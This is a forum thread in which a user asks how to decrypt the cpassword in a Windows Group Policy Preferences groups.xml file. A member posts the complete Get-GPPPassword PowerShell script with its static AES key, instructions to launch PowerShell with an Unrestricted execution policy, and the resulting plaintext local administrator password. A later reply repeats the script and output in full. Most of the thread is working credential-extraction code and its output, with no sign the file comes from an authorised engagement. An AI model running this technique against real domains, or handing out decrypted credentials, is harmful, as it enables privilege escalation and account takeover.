Group Preferences decryption

[TeamVega]

HI Guys
Does anybody know how to decrypt the CPassword in the below groups.XML file, I have tried the Python script and the Powershell script, but it does not work, can you help me to decrypt it.

<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2012-03-01 05:38:29" uid="{A4E0DD4D-A99E-487A-80B6-64F37463688D}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="UZZnAJ1t0xuRwZh+S3dxNg309qQgg3qO6t3BbSF LHHM" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User></Groups>

Thanks

Staff note: you gotta be shitting me with colors and font! we can see just fine.

[desudesu~]

Hai,

I could give it to you, but what about presenting yourself before asking for help?

[TeamVega]

HI desudesu~


Thanks for the reply.


You dont have to give it to me, it would just be nice to see what I am doing wrong, so that I can learn where my mistake is. 


What would you like to know about me?

[geXXos]

1) Im interested to see the answer to this, cause your question is interesting too.
2) desudesu~ told you to wright an intro to the members introduction section,so we learn more about you.
3) Change the color and font of your Or. post  to avoid the roughness of an Admin or even worst skidiot.h 

4)Welcome at EZ

[TeamVega]

@ geXXos


Thanks its nice to be here and thanks for fixing the color and font layout, my mistake when posting  the post.

I have been researching the following sites: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences and the Get-GPPassword script by http://www.obscuresecurity.blogspot.com/but still cant seem to come right, Im not sure if the Hash is too large for the program to run or if there is a parameter I need to change.

[desudesu~]

HI desudesu~


Thanks for the reply.


You dont have to give it to me, it would just be nice to see what I am doing wrong, so that I can learn where my mistake is. 


What would you like to know about me?

Just go in the "Presentations" part of the forum and introduce yourself
I just don't think it is considered very good to have someone come in, ask for help, then disappear.

I don't know where your mistake is, because I don't know what you have done so far. But I simply ran a PS script and used the Groups.xml file.
Do you have any errors when running the Obscuresec script?

[TeamVega]

@ desudesu~

I`m using the powershell script based from www.obscuresecurity.blogspot.com but when running it against the groups.xml no information is displayed I have changed the $Pad = '=' * ((4 - ($Cpassword.length % 4)) % 4) on the attached powershell script. I`m not too sure what I am doing incorrectly.

[desudesu~]

You don't need to edit the script at all. I've just tried it and it worked as is;

Copy it to some .ps1 file:

Code: [Select]

<#
function Get-GPPPassword {

<#
.Synopsis

Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
Author: Chris Campbell (@obscuresec)
License: GNU GPL v2
.Description

Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.

.Parameter Path

The path to the targeted groups.xml file.

.Example

Get-GPPPassword -path c:\demo\groups.xml

.Link

http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )

    #Function to pull encrypted password string from groups.xml
    function Parse-cPassword {
   
        try {
            [xml] $Xml = Get-Content ($Path)
            [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
        } catch { Write-Error "No Password Policy Found in File!" }
         
        return $Cpassword
    }
   
    #Function to look to see if the administrator account is given a newname
    function Parse-NewName {
   
        [xml] $Xml = Get-Content ($Path)
        [String] $NewName = $Xml.Groups.User.Properties.newName
       
        return $NewName
    }
   
    #Function to parse out the Username whose password is being specified
    function Parse-UserName {
   
        try {
            [xml] $Xml = Get-Content ($Path)
            [string] $UserName = $Xml.Groups.User.Properties.userName
        } catch { Write-Error "No Username Specified in File!" }
       
        return $UserName
    }
   
    #Function that decodes and decrypts password
    function Decrypt-Password {
   
        try {
            #Append appropriate padding based on string length
            $Pad = "=" * (4 - ($Cpassword.length % 4))
            $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
            #Create a new AES .NET Crypto Object
            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
            #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
            #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
            $AesIV = New-Object Byte[]($AesObject.IV.Length)
            $AesObject.IV = $AesIV
            $AesObject.Key = $AesKey
            $DecryptorObject = $AesObject.CreateDecryptor()
            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
           
            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
        } catch { Write-Error "Decryption Failed!" }
     
    }

    $Cpassword = Parse-cPassword
    $Password = Decrypt-Password
    $NewName = Parse-NewName
    $UserName = Parse-UserName
   
    $Results = New-Object System.Object
   
    Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
    Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
    Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password

    return $Results
Launch your PS (on that machine I have to change the execution policy to Unrestricted)

From your cmd:

PowerShell -ExecutionPolicy Unrestricted

Then:

PS > .\yourfile.ps1 Groups.xml

It should return you:

UserName                                 NewName                                    Password
------------                                  ------------                                      ------------
Administrator (built-in)                                                                 L0c@LAdm!n

[TeamVega]

Thanks for your help desudesu~


Got it working!

[Daemon]

You don't need to edit the script at all. I've just tried it and it worked as is;

Copy it to some .ps1 file:

Code: [Select]

<#
function Get-GPPPassword {

<#
.Synopsis

Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
Author: Chris Campbell (@obscuresec)
License: GNU GPL v2
.Description

Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.

.Parameter Path

The path to the targeted groups.xml file.

.Example

Get-GPPPassword -path c:\demo\groups.xml

.Link

http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )

    #Function to pull encrypted password string from groups.xml
    function Parse-cPassword {
   
        try {
            [xml] $Xml = Get-Content ($Path)
            [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
        } catch { Write-Error "No Password Policy Found in File!" }
         
        return $Cpassword
    }
   
    #Function to look to see if the administrator account is given a newname
    function Parse-NewName {
   
        [xml] $Xml = Get-Content ($Path)
        [String] $NewName = $Xml.Groups.User.Properties.newName
       
        return $NewName
    }
   
    #Function to parse out the Username whose password is being specified
    function Parse-UserName {
   
        try {
            [xml] $Xml = Get-Content ($Path)
            [string] $UserName = $Xml.Groups.User.Properties.userName
        } catch { Write-Error "No Username Specified in File!" }
       
        return $UserName
    }
   
    #Function that decodes and decrypts password
    function Decrypt-Password {
   
        try {
            #Append appropriate padding based on string length
            $Pad = "=" * (4 - ($Cpassword.length % 4))
            $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
            #Create a new AES .NET Crypto Object
            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
            #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
            #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
            $AesIV = New-Object Byte[]($AesObject.IV.Length)
            $AesObject.IV = $AesIV
            $AesObject.Key = $AesKey
            $DecryptorObject = $AesObject.CreateDecryptor()
            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
           
            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
        } catch { Write-Error "Decryption Failed!" }
     
    }

    $Cpassword = Parse-cPassword
    $Password = Decrypt-Password
    $NewName = Parse-NewName
    $UserName = Parse-UserName
   
    $Results = New-Object System.Object
   
    Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
    Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
    Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password

    return $Results
Launch your PS (on that machine I have to change the execution policy to Unrestricted)

From your cmd:

PowerShell -ExecutionPolicy Unrestricted

Then:

PS > .\yourfile.ps1 Groups.xml

It should return you:

UserName                                 NewName                                    Password
------------                                  ------------                                      ------------
Administrator (built-in)                                                                 L0c@LAdm!n

Whoa, ill be honest. with such a cutesy name I REALLY wasn't expecting that. I figured youd post an intro and post in random some then we'd never hear from you again. Sorry to understimate you,  +1 to you Desudesu~ .
Now excuse me while i go and pick my jaw up off the floor...

[TeamVega]

@ Daemon


I Just want to say that I`m glad to be a part of the community and will try to be an active member to help others, like you guys have helped me.